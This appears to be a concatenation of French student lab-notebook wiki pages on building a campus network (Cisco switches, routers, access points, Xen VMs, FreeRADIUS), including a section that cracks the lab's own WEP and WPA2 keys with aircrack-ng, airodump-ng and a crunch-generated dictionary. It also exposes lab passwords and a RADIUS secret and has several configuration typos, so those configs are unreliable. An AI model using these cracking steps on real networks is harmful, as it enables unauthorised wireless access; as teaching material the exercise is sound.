interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCPi===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP système & reseau IMA2a5 2019/2020

2019-11-28T16:50:42Z

Jcabrald :

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2017 - 2020 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Répartition des binômes ==

{| class="wikitable"
! Page du groupe !! Prénom & NOM !! Nom de domaine acheté !! Certificat associé ?
|-
| [[ TP sysres IMA2a5 2019/2020 G1 | Cahier groupe n°1]]
| Fabien CAVALIER & Maxime HIRT
|[https://ima2a5-zerofun.site https://ima2a5-zerofun.site ]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G2 | Cahier groupe n°2]]
| Ekaterina ISHCHUK & Loick MOLLET
| [https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G3 | Cahier groupe n°3]]
| Quentin WEISBECKER & Pascal COINT
|[https://ima2a5-rex4ever.site https://ima2a5-rex4ever.site]
|[https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Affectation_du_certificat_sur_Gandi.net voir ici]
|-
| [[ TP sysres IMA2a5 2019/2020 G4 | Cahier groupe n°4]]
| Malick SECK & Gael WATBLED
|[https://ima2a5-wateck.site https://ima2a5-wateck.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G5 | Cahier groupe n°5]]
| Quentin VERNE & Adrien MONFILLIETTE
|[https://ima2a5-nofun.site https://ima2a5-nofun.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G6 | Cahier groupe n°6]]
| Hamza FAHIM & Jorge CABRAL-DAS-DORES
| [https://ima2a5-4fun.site https://ima2a5-4fun.site]
|
|-
|}

== Table IP VLANs ==

{| class="wikitable" style="text-align:center"
! Nom !! Vlan !! Réseau IPV4 (Routé) !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel !! IPv4 VLAN Wi-Fi (non routé)
|-
|Xen
|42
|193.48.57.160/28
|2001:660:4401:60B1::/64
|193.48.57.174
|193.48.57.173
|193.48.57.172
| ****
|-
|Groupe 1
|2
| ****
|2001:660:4401:60B2::/64
|10.60.1.254
|10.60.1.253
|10.60.1.252
|10.60.1.0/16
|-
|Groupe 2
|3
| ****
|2001:660:4401:60B3::/64
|10.60.2.254
|10.60.2.253
|10.60.2.252
|10.60.2.0/16
|-
|Groupe 3
|4
| ****
|2001:660:4401:60B4::/64
|10.60.3.254
|10.60.3.253
|10.60.3.252
|10.60.3.0/16
|-
|Groupe 4
|5
| ****
|2001:660:4401:60B5::/64
|10.60.4.254
|10.60.4.253
|10.60.4.252
|10.60.4.0/16
|-
|Groupe 5
|6
| ****
|2001:660:4401:60B6::/64
|10.60.5.254
|10.60.5.253
|10.60.5.252
|10.60.5.0/16
|-
|Groupe 6
|7
| ****
|2001:660:4401:60B7::/64
|10.60.6.254
|10.60.6.253
|10.60.6.252
|10.60.6.0/16
|-
|}

== Architecture matérielle ==

[[Fichier:Archi_IMA2A5.jpg|500px|center|thumb|© Copyright Minou]]

== Machines virtuelles ==

{| class="wikitable"
!Groupe !! Nom de la VM !! IP de la VM
|-
|Groupe 1
|ima2a5-zerofun
|193.48.57.161/28
|-
|Groupe 2
|ima2a5-mol-ish
|193.48.57.162/28
|-
|Groupe 3
|ima2a5-rex4ever
|193.48.57.163/28
|-
|Groupe 4
|ima2a5-wateck
|193.48.57.164/28
|-
|Groupe 5
|ima2a5-nofun
|193.48.57.165/28
|-
|Groupe 6
|ima2a5-4fun
|193.48.57.166/28
|-
|}

== Bornes Wi-Fi ==

{| class="wikitable"
!Groupe !! Nom de la VM !! Nom SSID
|-
|Groupe 1
|ima2a5-zerofun
|SSID_ima2a5-zerofun
|-
|Groupe 2
|ima2a5-mol-ish
|SSID_ima2a5-mol-ish
|-
|Groupe 3
|ima2a5-rex4ever
|SSID_ima2a5-rex4ever
|-
|Groupe 4
|ima2a5-wateck
|SSID_ima2a5-wateck
|-
|Groupe 5
|ima2a5-nofun
|SSID_ima2a5-nofun
|-
|Groupe 6
|ima2a5-4fun
|SSID_ima2a5-4fun
|-
|}

== Architecture Réseau ==

Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.

=== Configuration des 2 commutateurs ===

===== Connexion =====

Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs

enable // passage en admin pour pouvoir accéder aux données du commutateur

write // Sauvegarde de la configuration et l’implanter dans le commutateur

show interface status OU sh int status // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées

configuration terminal // permets d'accéder aux interfaces et ainsi pouvoir les modifier

exit // permets de sortir du configurateur actuel (par exemple sortir de l'interface)

==== Configuration des ports du commutateur ====

Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306
- Un lien vers le routeur
- Un lien vers la borne wifi
- Un lien vers Corduan
- Un lien vers l'autre commutateur

{| class="wikitable" style="text-align: center;width: 85%;margin: auto;"
! Connexion !! E304 !! E306
|-
! scope="row" style="width: 20%"|Corduan
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Borne Wifi
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Commutateur
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Router
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
|}
}

===== Création du lien pour la borne wifi =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport //Rendre accessible la modification du port
switchport trunk encapsulation dot1q //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port
switchport mode trunk //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port
no shut //Démarre le port ou de le garder actif
exit
exit
write

===== Création du lien pour Corduan =====

enable
configure terminal
interface XXXX
switchport
switchport mode access //Rendre modifiable le port
switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port
no shutdown
exit
exit
write

===== Création du lien pour le router =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création du lien pour l'autre commutateur =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création des Vlan =====

enable
conf t
vlan 42
name Corduan
exit
exit
write

enable
conf t
vlan 2 à 7
name groupe 1 à 6
exit
exit
write

enable
conf t
vlan 130
name interconnexion
exit
exit
write

Pour supprimer un vlan il suffit de faire :
no vlan X

=== Configuration du router E304 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion

enable

configure terminal

interface XXXX
no ip address //Pas d'addresse IP associé
negotiation auto //Détermine automatiquement la vitesse de transfert
media-type RJ45 //Type de connexion (ici RJ45)

Voici les vlan associé à nos groupes :

service instance 2 ethernet // création d'un vlan 2 dans cette interface
encapsulation dot1q 2 // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk
rewrite ingress tag pop 1 symmetric // retire le tag du vlan
bridge-domain 2 //création d'un bridge domaine interface (BDI) attribué au chiffre 2

service instance 3 ethernet
encapsulation dot1q 3
rewrite ingress tag pop 1 symmetric
bridge-domain 3

service instance 4 ethernet
encapsulation dot1q 4
rewrite ingress tag pop 1 symmetric
bridge-domain 4

service instance 5 ethernet
encapsulation dot1q 5
rewrite ingress tag pop 1 symmetric
bridge-domain 5

service instance 6 ethernet
encapsulation dot1q 6
rewrite ingress tag pop 1 symmetric
bridge-domain 6

service instance 7 ethernet
encapsulation dot1q 7
rewrite ingress tag pop 1 symmetric
bridge-domain 7

Voici le vlan associé à l'interconnexion :

service instance 42 ethernet
encapsulation dot1q 42
rewrite ingress tag pop 1 symmetric
bridge-domain 42

====== Vers le SR 32 ======
interface XXXX
no ip address
negotiation auto
service instance 130 ethernet
encapsulation dot1q 130
bridge-domain 130

===== Configuration des BDI =====

conf t
interface BDI2
ip address 10.60.1.254 255.255.255.000 //Attribut l'addresse IPV4 pour le routeur ainsi que son mask
standby version 2 //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1
standby 3 ip 10.60.1.252 //Donne l'addresse IPV4 du routeur virtuelle pour le HSRP
standby 3 preempt // Activation du HSRP
ipv6 address 2001:660:4401:60B3::/64 eui-64 //Attribut l'addresse IPV6
ipv6 enable //Active l'addressage IPV6
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900 //Donner un préfixe IPV6 à chaque machine
ipv6 nd router-preference high //IPV6 sera la route de préférence par défaut avec une forte probabilitée
exit

interface BDI3
ip address 10.60.2.254 255.255.255.000
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI4
ip address 10.60.3.254 255.255.255.000
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI5
ip address 10.60.4.254 255.255.255.000
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI6
ip address 10.60.5.254 255.255.255.000
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI7
ip address 10.60.6.254 255.255.255.000
standby version 2
standby 6 ip 10.60.6.252
standby 6 preempt
ipv6 address 2001:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI42
ip address 193.48.57.173 255.255.255.240
standby version 2
standby 7 ip 193.48.57.172
standby 7 preempt
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
exit

int vlan 130
ip address 192.168.222.1 255.255.255.248
ipv6 address fe80::2 link-local
ipv6 enable
ipv6 rip tpima2a5 enable
exit
ip rooting

exit
write

==== Interconnexion du réseau IPV4 ====

Se le faire expliquer parce que rien compris

configure terminal
ip routing
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.254
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

==== Sécurisation du réseau ====

Question pour Redon addresse Ip à définir

conf t
int XXXX
ip address 10.10.10.2 255.255.255.0
vrrp 1 ip 10.10.10.3
vrrp 1 preempt //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place
vrrp 1 priority 100 //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité
exit
exit
write

=== Configuration du router E306 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio

conf t
interface Vlan2
ip address 10.60.1.253 255.255.255.0
ipv6 address 2001:660:4401:60B2::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 2 ip 10.60.1.252
standby 2 preempt
exit

interface Vlan3
ip address 10.60.2.253 255.255.255.0
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
exit

interface Vlan4
ip address 10.60.3.253 255.255.255.0
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
exit

interface Vlan5
ip address 10.60.4.253 255.255.255.0
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
exit

interface Vlan6
ip address 10.60.5.253 255.255.255.0
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
exit

interface Vlan7
ip address 10.60.6.253 255.255.255.0
ipv6 address 2201:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 7 ip 10.60.6.252
standby 7 preempt
exit

interface Vlan42
ip address 193.48.57.174 255.255.255.0
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 42 ip 193.48.57.172
standby 42 preempt
exit

interface Vlan130
ip address 192.168.222.2 255.255.255.248
ipv6 address FE80::42:2 link-local
ipv6 enable
exit

exit
write

==== Interconnexion du réseau IPV4 ====

configure terminal
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.253
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

TP sysres IMA2a5 2019/2020 G6

2019-11-28T16:38:41Z

Jcabrald : /* Mise ne place du serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCPi===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande
